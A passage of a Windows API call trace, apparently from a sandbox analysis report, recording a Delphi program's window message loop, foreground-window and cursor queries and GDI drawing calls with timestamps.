(lpString="ControlOfs06BA000000000C04") returned 0xc031 [0044.223] GetPropW (hWnd=0x100ce, lpString=0xc031) returned 0x0 [0044.224] GetParent (hWnd=0x100ce) returned 0x100ca [0044.224] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0044.224] GetCurrentProcessId () returned 0x4f0 [0044.224] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0044.224] GetPropW (hWnd=0x100ca, lpString=0xc031) returned 0x0 [0044.224] GetParent (hWnd=0x100ca) returned 0x0 [0044.224] IsWindowVisible (hWnd=0x10166) returned 1 [0044.224] IsWindowEnabled (hWnd=0x10166) returned 1 [0044.224] GetCurrentThreadId () returned 0xc04 [0044.224] ResetEvent (hEvent=0xb2c) returned 1 [0044.224] GetCurrentThreadId () returned 0xc04 [0044.224] GetCurrentThreadId () returned 0xc04 [0044.224] GetCurrentThreadId () returned 0xc04 [0044.224] WaitMessage () returned 1 [0044.750] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0044.750] IsWindowUnicode (hWnd=0x30150) returned 1 [0044.750] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0044.750] GetCapture () returned 0x0 [0044.750] GetWindowThreadProcessId (in: hWnd=0x30150, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0044.750] GetCurrentProcessId () returned 0x4f0 [0044.750] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0044.750] GetPropW (hWnd=0x30150, lpString=0xc031) returned 0x0 [0044.751] GetParent (hWnd=0x30150) returned 0x0 [0044.751] TranslateMessage (lpMsg=0x68ff884) returned 0 [0044.751] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0044.751] GetForegroundWindow () returned 0x10166 [0044.751] SendMessageW (hWnd=0x10166, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0x4 [0044.751] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0x4 [0044.751] GetCurrentThreadId () returned 0xc04 [0044.751] GetCurrentThreadId () returned 0xc04 [0044.751] GetCurrentThreadId () returned 0xc04 [0044.751] GetCurrentThreadId () returned 0xc04 [0044.751] GetCurrentThreadId () returned 0xc04 [0044.751] GetCurrentThreadId () returned 0xc04 [0044.751] GetClassNameW (in: hWnd=0x10166, lpClassName=0x68ff44e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0044.752] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 0 [0044.752] GetCursorPos (in: lpPoint=0x68ff844 | out: lpPoint=0x68ff844*(x=1126, y=518)) returned 1 [0044.752] WindowFromPoint (Point=0x466) returned 0x100d0 [0044.752] GetWindowThreadProcessId (in: hWnd=0x100d0, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0044.752] GetCurrentProcessId () returned 0x4f0 [0044.752] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0044.752] GetPropW (hWnd=0x100d0, lpString=0xc031) returned 0x0 [0044.752] GetParent (hWnd=0x100d0) returned 0x100ce [0044.752] GetWindowThreadProcessId (in: hWnd=0x100ce, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0044.752] GetCurrentProcessId () returned 0x4f0 [0044.752] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0044.752] GetPropW (hWnd=0x100ce, lpString=0xc031) returned 0x0 [0044.752] GetParent (hWnd=0x100ce) returned 0x100ca [0044.752] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0044.752] GetCurrentProcessId () returned 0x4f0 [0044.752] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0044.753] GetPropW (hWnd=0x100ca, lpString=0xc031) returned 0x0 [0044.753] GetParent (hWnd=0x100ca) returned 0x0 [0044.753] IsWindowVisible (hWnd=0x10166) returned 1 [0044.753] IsWindowEnabled (hWnd=0x10166) returned 1 [0044.753] GetCurrentThreadId () returned 0xc04 [0044.753] ResetEvent (hEvent=0xb2c) returned 1 [0044.753] GetCurrentThreadId () returned 0xc04 [0044.753] GetCurrentThreadId () returned 0xc04 [0044.753] GetCurrentThreadId () returned 0xc04 [0044.753] WaitMessage () returned 1 [0045.732] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0045.732] IsWindowUnicode (hWnd=0x40148) returned 1 [0045.732] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0045.733] GetCapture () returned 0x0 [0045.733] GetWindowThreadProcessId (in: hWnd=0x40148, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0045.733] GetCurrentProcessId () returned 0x4f0 [0045.733] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0045.733] GetPropW (hWnd=0x40148, lpString=0xc031) returned 0x0 [0045.733] GetParent (hWnd=0x40148) returned 0x0 [0045.733] TranslateMessage (lpMsg=0x68ff884) returned 0 [0045.733] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0045.733] GetForegroundWindow () returned 0x10166 [0045.733] GetClassNameW (in: hWnd=0x10166, lpClassName=0x68ff44e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0045.733] GetWindowTextW (in: hWnd=0x10166, lpString=0x68ff4f0, nMaxCount=256 | out: lpString="k8w0") returned 4 [0045.734] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0x4 [0045.734] GetCurrentThreadId () returned 0xc04 [0045.734] GetCurrentThreadId () returned 0xc04 [0045.734] GetCurrentThreadId () returned 0xc04 [0045.734] GetCurrentThreadId () returned 0xc04 [0045.734] GetCurrentThreadId () returned 0xc04 [0045.734] GetCurrentThreadId () returned 0xc04 [0045.734] GetLocalTime (in: lpSystemTime=0x68ff314 | out: lpSystemTime=0x68ff314*(wYear=0x7e0, wMonth=0x9, wDayOfWeek=0x5, wDay=0x2, wHour=0x9, wMinute=0x38, wSecond=0x8, wMilliseconds=0x1aa)) [0045.734] InvalidateRect (hWnd=0x10166, lpRect=0x68ff18c, bErase=1) returned 1 [0045.734] GetDC (hWnd=0x0) returned 0x20010728 [0045.734] MoveToEx (in: hdc=0x20010728, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0045.735] SelectObject (hdc=0x20010728, h=0x130a01ce) returned 0x18a002e [0045.735] GetSysColor (nIndex=8) returned 0x0 [0045.735] SetTextColor (hdc=0x20010728, color=0x0) returned 0x0 [0045.735] SelectObject (hdc=0x20010728, h=0x1f3001b7) returned 0x1b00017 [0045.735] SetROP2 (hdc=0x20010728, rop2=13) returned 13 [0045.735] UnrealizeObject (h=0x17100741) returned 1 [0045.735] SelectObject (hdc=0x20010728, h=0x17100741) returned 0x1900010 [0045.735] SetBkColor (hdc=0x20010728, color=0xffffff) returned 0xffffff [0045.735] SetBkMode (hdc=0x20010728, mode=2) returned 2 [0045.735] GetSysColor (nIndex=8) returned 0x0 [0045.735] GetSysColor (nIndex=14) returned 0xffffff [0045.736] DrawThemeTextEx () returned 0x0 [0045.736] SelectObject (hdc=0x20010728, h=0x1b00017) returned 0x1f3001b7 [0045.736] SelectObject (hdc=0x20010728, h=0x1900015) returned 0x17100741 [0045.736] SelectObject (hdc=0x20010728, h=0x18a002e) returned 0x130a01ce [0045.736] GetCurrentPositionEx (in: hdc=0x20010728, lppt=0x68ff15c | out: lppt=0x68ff15c) returned 1 [0045.736] ReleaseDC (hWnd=0x0, hDC=0x20010728) returned 1 [0045.736] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 0 [0045.736] GetCursorPos (in: lpPoint=0x68ff844 | out: lpPoint=0x68ff844*(x=1126, y=518)) returned 1 [0045.736] WindowFromPoint (Point=0x466) returned 0x100d0 [0045.736] GetWindowThreadProcessId (in: hWnd=0x100d0, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0045.737] GetCurrentProcessId () returned 0x4f0 [0045.737] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0045.737] GetPropW (hWnd=0x100d0, lpString=0xc031) returned 0x0 [0045.737] GetParent (hWnd=0x100d0) returned 0x100ce [0045.737] GetWindowThreadProcessId (in: hWnd=0x100ce, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0045.737] GetCurrentProcessId () returned 0x4f0 [0045.737] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0045.737] GetPropW (hWnd=0x100ce, lpString=0xc031) returned 0x0 [0045.737] GetParent (hWnd=0x100ce) returned 0x100ca [0045.737] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0045.737] GetCurrentProcessId () returned 0x4f0 [0045.737] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0045.738] GetPropW (hWnd=0x100ca, lpString=0xc031) returned 0x0 [0045.738] GetParent (hWnd=0x100ca) returned 0x0 [0045.738] IsWindowVisible (hWnd=0x10166) returned 1 [0045.738] IsWindowEnabled (hWnd=0x10166) returned 1 [0045.738] GetCurrentThreadId () returned 0xc04 [0045.738] ResetEvent (hEvent=0xb2c) returned 1 [0045.738] GetCurrentThreadId () returned 0xc04 [0045.738] GetCurrentThreadId () returned 0xc04 [0045.738] GetCurrentThreadId () returned 0xc04 [0045.738] WaitMessage () returned 1 [0045.764] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0045.764] IsWindowUnicode (hWnd=0x30150) returned 1 [0045.764] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0045.764] GetCapture () returned 0x0 [0045.764] GetWindowThreadProcessId (in: hWnd=0x30150, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0045.764] GetCurrentProcessId () returned 0x4f0 [0045.764] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0045.764] GetPropW (hWnd=0x30150, lpString=0xc031) returned 0x0 [0045.764] GetParent (hWnd=0x30150) returned 0x0 [0045.764] TranslateMessage (lpMsg=0x68ff884) returned 0 [0045.764] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0045.764] GetForegroundWindow () returned 0x100d0 [0045.764] SendMessageW (hWnd=0x100d0, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0xa [0045.764] GetClassNameW (in: hWnd=0x100d0, lpClassName=0x68ff44e, nMaxCount=256 | out: lpClassName="SysListView32") returned 13 [0045.765] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 0 [0045.765] GetCursorPos (in: lpPoint=0x68ff844 | out: lpPoint=0x68ff844*(x=1126, y=518)) returned 1 [0045.765] WindowFromPoint (Point=0x466) returned 0x100d0 [0045.765] GetWindowThreadProcessId (in: hWnd=0x100d0, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0045.765] GetCurrentProcessId () returned 0x4f0 [0045.765] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0045.765] GetPropW (hWnd=0x100d0, lpString=0xc031) returned 0x0 [0045.765] GetParent (hWnd=0x100d0) returned 0x100ce [0045.765] GetWindowThreadProcessId (in: hWnd=0x100ce, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0045.765] GetCurrentProcessId () returned 0x4f0 [0045.765] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0045.765] GetPropW (hWnd=0x100ce, lpString=0xc031) returned 0x0 [0045.765] GetParent (hWnd=0x100ce) returned 0x100ca [0045.765] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0045.765] GetCurrentProcessId () returned 0x4f0 [0045.766] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0045.766] GetPropW (hWnd=0x100ca, lpString=0xc031) returned 0x0 [0045.766] GetParent (hWnd=0x100ca) returned 0x0 [0045.766] IsWindowVisible (hWnd=0x10166) returned 1 [0045.766] IsWindowEnabled (hWnd=0x10166) returned 1 [0045.766] GetCurrentThreadId () returned 0xc04 [0045.766] ResetEvent (hEvent=0xb2c) returned 1 [0045.766] GetCurrentThreadId () returned 0xc04 [0045.766] GetCurrentThreadId () returned 0xc04 [0045.766] GetCurrentThreadId () returned 0xc04 [0045.766] WaitMessage () returned 1 [0046.778] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0046.778] IsWindowUnicode (hWnd=0x30150) returned 1 [0046.778] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0046.778] GetCapture () returned 0x0 [0046.778] GetWindowThreadProcessId (in: hWnd=0x30150, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0046.778] GetCurrentProcessId () returned 0x4f0 [0046.778] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0046.778] GetPropW (hWnd=0x30150, lpString=0xc031) returned 0x0 [0046.778] GetParent (hWnd=0x30150) returned 0x0 [0046.778] TranslateMessage (lpMsg=0x68ff884) returned 0 [0046.778] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0046.778] GetForegroundWindow () returned 0x10166 [0046.778] SendMessageW (hWnd=0x10166, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0x4 [0046.779] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0x4 [0046.779] GetCurrentThreadId () returned 0xc04 [0046.779] GetCurrentThreadId () returned 0xc04 [0046.779] GetCurrentThreadId () returned 0xc04 [0046.779] GetCurrentThreadId () returned 0xc04 [0046.779] GetCurrentThreadId () returned 0xc04 [0046.779] GetCurrentThreadId () returned 0xc04 [0046.779] GetClassNameW (in: hWnd=0x10166, lpClassName=0x68ff44e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0046.779] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 0 [0046.779] GetCursorPos (in: lpPoint=0x68ff844 | out: lpPoint=0x68ff844*(x=1126, y=518)) returned 1 [0046.779] WindowFromPoint (Point=0x466) returned 0x100d0 [0046.779] GetWindowThreadProcessId (in: hWnd=0x100d0, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0046.779] GetCurrentProcessId () returned 0x4f0 [0046.780] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0046.780] GetPropW (hWnd=0x100d0, lpString=0xc031) returned 0x0 [0046.780] GetParent (hWnd=0x100d0) returned 0x100ce [0046.780] GetWindowThreadProcessId (in: hWnd=0x100ce, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0046.780] GetCurrentProcessId () returned 0x4f0 [0046.780] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0046.780] GetPropW (hWnd=0x100ce, lpString=0xc031) returned 0x0 [0046.780] GetParent (hWnd=0x100ce) returned 0x100ca [0046.780] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0046.780] GetCurrentProcessId () returned 0x4f0 [0046.780] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0046.780] GetPropW (hWnd=0x100ca, lpString=0xc031) returned 0x0 [0046.780] GetParent (hWnd=0x100ca) returned 0x0 [0046.780] IsWindowVisible (hWnd=0x10166) returned 1 [0046.780] IsWindowEnabled (hWnd=0x10166) returned 1 [0046.781] GetCurrentThreadId () returned 0xc04 [0046.781] ResetEvent (hEvent=0xb2c) returned 1 [0046.781] GetCurrentThreadId () returned 0xc04 [0046.781] GetCurrentThreadId () returned 0xc04 [0046.781] GetCurrentThreadId () returned 0xc04 [0046.781] WaitMessage () returned 1 [0047.246] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0047.246] IsWindowUnicode (hWnd=0x40148) returned 1 [0047.246] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0047.246] GetCapture () returned 0x0 [0047.246] GetWindowThreadProcessId (in: hWnd=0x40148, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0047.246] GetCurrentProcessId () returned 0x4f0 [0047.246] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0047.246] GetPropW (hWnd=0x40148, lpString=0xc031) returned 0x0 [0047.246] GetParent (hWnd=0x40148) returned 0x0 [0047.246] TranslateMessage (lpMsg=0x68ff884) returned 0 [0047.246] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0047.246] GetForegroundWindow () returned 0x10166 [0047.246] GetClassNameW (in: hWnd=0x10166, lpClassName=0x68ff44e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0047.247] GetWindowTextW (in: hWnd=0x10166, lpString=0x68ff4f0, nMaxCount=256 | out: lpString="k8w0") returned 4 [0047.247] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0x4 [0047.247] GetCurrentThreadId () returned 0xc04 [0047.247] GetCurrentThreadId () returned 0xc04 [0047.247] GetCurrentThreadId () returned 0xc04 [0047.247] GetCurrentThreadId () returned 0xc04 [0047.247] GetCurrentThreadId () returned 0xc04 [0047.247] GetCurrentThreadId () returned 0xc04 [0047.247] GetLocalTime (in: lpSystemTime=0x68ff314 | out: lpSystemTime=0x68ff314*(wYear=0x7e0, wMonth=0x9, wDayOfWeek=0x5, wDay=0x2, wHour=0x9, wMinute=0x38, wSecond=0x9, wMilliseconds=0x3ab)) [0047.247] InvalidateRect (hWnd=0x10166, lpRect=0x68ff18c, bErase=1) returned 1 [0047.247] GetDC (hWnd=0x0) returned 0x20010728 [0047.248] MoveToEx (in: hdc=0x20010728, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0047.248] SelectObject (hdc=0x20010728, h=0x130a01ce) returned 0x18a002e [0047.248] GetSysColor (nIndex=8) returned 0x0 [0047.248] SetTextColor (hdc=0x20010728, color=0x0) returned 0x0 [0047.248] SelectObject (hdc=0x20010728, h=0x1f3001b7) returned 0x1b00017 [0047.248] SetROP2 (hdc=0x20010728, rop2=13) returned 13 [0047.248] UnrealizeObject (h=0x17100741) returned 1 [0047.248] SelectObject (hdc=0x20010728, h=0x17100741) returned 0x1900010 [0047.248] SetBkColor (hdc=0x20010728, color=0xffffff) returned 0xffffff [0047.248] SetBkMode (hdc=0x20010728, mode=2) returned 2 [0047.248] GetSysColor (nIndex=8) returned 0x0 [0047.248] GetSysColor (nIndex=14) returned 0xffffff [0047.248] DrawThemeTextEx () returned 0x0 [0047.249] SelectObject (hdc=0x20010728, h=0x1b00017) returned 0x1f3001b7 [0047.249] SelectObject (hdc=0x20010728, h=0x1900015) returned 0x17100741 [0047.249] SelectObject (hdc=0x20010728, h=0x18a002e) returned 0x130a01ce [0047.249] GetCurrentPositionEx (in: hdc=0x20010728, lppt=0x68ff15c | out: lppt=0x68ff15c) returned 1 [0047.249] ReleaseDC (hWnd=0x0, hDC=0x20010728) returned 1 [0047.249] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 0 [0047.249] GetCursorPos (in: lpPoint=0x68ff844 | out: lpPoint=0x68ff844*(x=1126, y=518)) returned 1 [0047.249] WindowFromPoint (Point=0x466) returned 0x100d0 [0047.249] GetWindowThreadProcessId (in: hWnd=0x100d0, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0047.249] GetCurrentProcessId () returned 0x4f0 [0047.249] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0047.249] GetPropW (hWnd=0x100d0, lpString=0xc031) returned 0x0 [0047.250] GetParent (hWnd=0x100d0) returned 0x100ce [0047.250] GetWindowThreadProcessId (in: hWnd=0x100ce, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0047.250] GetCurrentProcessId () returned 0x4f0 [0047.250] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0047.250] GetPropW (hWnd=0x100ce, lpString=0xc031) returned 0x0 [0047.250] GetParent (hWnd=0x100ce) returned 0x100ca [0047.250] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0047.250] GetCurrentProcessId () returned 0x4f0 [0047.250] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0047.250] GetPropW (hWnd=0x100ca, lpString=0xc031) returned 0x0 [0047.250] GetParent (hWnd=0x100ca) returned 0x0 [0047.250] IsWindowVisible (hWnd=0x10166) returned 1 [0047.250] IsWindowEnabled (hWnd=0x10166) returned 1 [0047.250] GetCurrentThreadId () returned 0xc04 [0047.251] ResetEvent (hEvent=0xb2c) returned 1 [0047.251] GetCurrentThreadId () returned 0xc04 [0047.251] GetCurrentThreadId () returned 0xc04 [0047.251] GetCurrentThreadId () returned 0xc04 [0047.251] WaitMessage () returned 1 [0047.792] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0047.792] IsWindowUnicode (hWnd=0x30150) returned 1 [0047.792] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0047.792] GetCapture () returned 0x0 [0047.792] GetWindowThreadProcessId (in: hWnd=0x30150, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0047.792] GetCurrentProcessId () returned 0x4f0 [0047.792] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0047.792] GetPropW (hWnd=0x30150, lpString=0xc031) returned 0x0 [0047.792] GetParent (hWnd=0x30150) returned 0x0 [0047.792] TranslateMessage (lpMsg=0x68ff884) returned 0 [0047.792] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0047.792] GetForegroundWindow () returned 0x10166 [0047.792] SendMessageW (hWnd=0x10166, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0x4 [0047.792] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0x4 [0047.792] GetCurrentThreadId () returned 0xc04 [0047.792] GetCurrentThreadId () returned 0xc04 [0047.792] GetCurrentThreadId () returned 0xc04 [0047.793] GetCurrentThreadId () returned 0xc04 [0047.793] GetCurrentThreadId () returned 0xc04 [0047.793] GetCurrentThreadId () returned 0xc04 [0047.793] GetClassNameW (in: hWnd=0x10166, lpClassName=0x68ff44e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0047.793] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 0 [0047.793] GetCursorPos (in: lpPoint=0x68ff844 | out: lpPoint=0x68ff844*(x=1126, y=518)) returned 1 [0047.793] WindowFromPoint (Point=0x466) returned 0x100d0 [0047.793] GetWindowThreadProcessId (in: hWnd=0x100d0, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0047.793] GetCurrentProcessId () returned 0x4f0 [0047.793] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0047.793] GetPropW (hWnd=0x100d0, lpString=0xc031) returned 0x0 [0047.793] GetParent (hWnd=0x100d0) returned 0x100ce [0047.793] GetWindowThreadProcessId (in: hWnd=0x100ce, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0047.793] GetCurrentProcessId () returned 0x4f0 [0047.793] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0047.793] GetPropW (hWnd=0x100ce, lpString=0xc031) returned 0x0 [0047.793] GetParent (hWnd=0x100ce) returned 0x100ca [0047.794] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0047.794] GetCurrentProcessId () returned 0x4f0 [0047.794] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0047.794] GetPropW (hWnd=0x100ca, lpString=0xc031) returned 0x0 [0047.794] GetParent (hWnd=0x100ca) returned 0x0 [0047.794] IsWindowVisible (hWnd=0x10166) returned 1 [0047.794] IsWindowEnabled (hWnd=0x10166) returned 1 [0047.794] GetCurrentThreadId () returned 0xc04 [0047.794] ResetEvent (hEvent=0xb2c) returned 1 [0047.794] GetCurrentThreadId () returned 0xc04 [0047.794] GetCurrentThreadId () returned 0xc04 [0047.794] GetCurrentThreadId () returned 0xc04 [0047.794] WaitMessage () returned 1 [0048.759] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0048.759] IsWindowUnicode (hWnd=0x40148) returned 1 [0048.759] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0048.759] GetCapture () returned 0x0 [0048.759] GetWindowThreadProcessId (in: hWnd=0x40148, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0048.759] GetCurrentProcessId () returned 0x4f0 [0048.759] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0048.759] GetPropW (hWnd=0x40148, lpString=0xc031) returned 0x0 [0048.759] GetParent (hWnd=0x40148) returned 0x0 [0048.759] TranslateMessage (lpMsg=0x68ff884) returned 0 [0048.760] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0048.760] GetForegroundWindow () returned 0x10166 [0048.760] GetClassNameW (in: hWnd=0x10166, lpClassName=0x68ff44e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0048.760] GetWindowTextW (in: hWnd=0x10166, lpString=0x68ff4f0, nMaxCount=256 | out: lpString="k8w0") returned 4 [0048.760] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0x4 [0048.760] GetCurrentThreadId () returned 0xc04 [0048.760] GetCurrentThreadId () returned 0xc04 [0048.760] GetCurrentThreadId () returned 0xc04 [0048.760] GetCurrentThreadId () returned 0xc04 [0048.760] GetCurrentThreadId () returned 0xc04 [0048.760] GetCurrentThreadId () returned 0xc04 [0048.760] GetLocalTime (in: lpSystemTime=0x68ff314 | out: lpSystemTime=0x68ff314*(wYear=0x7e0, wMonth=0x9, wDayOfWeek=0x5, wDay=0x2, wHour=0x9, wMinute=0x38, wSecond=0xb, wMilliseconds=0x1c5)) [0048.760] InvalidateRect (hWnd=0x10166, lpRect=0x68ff18c, bErase=1) returned 1 [0048.761] GetDC (hWnd=0x0) returned 0x20010728 [0048.761] MoveToEx (in: hdc=0x20010728, x=0, 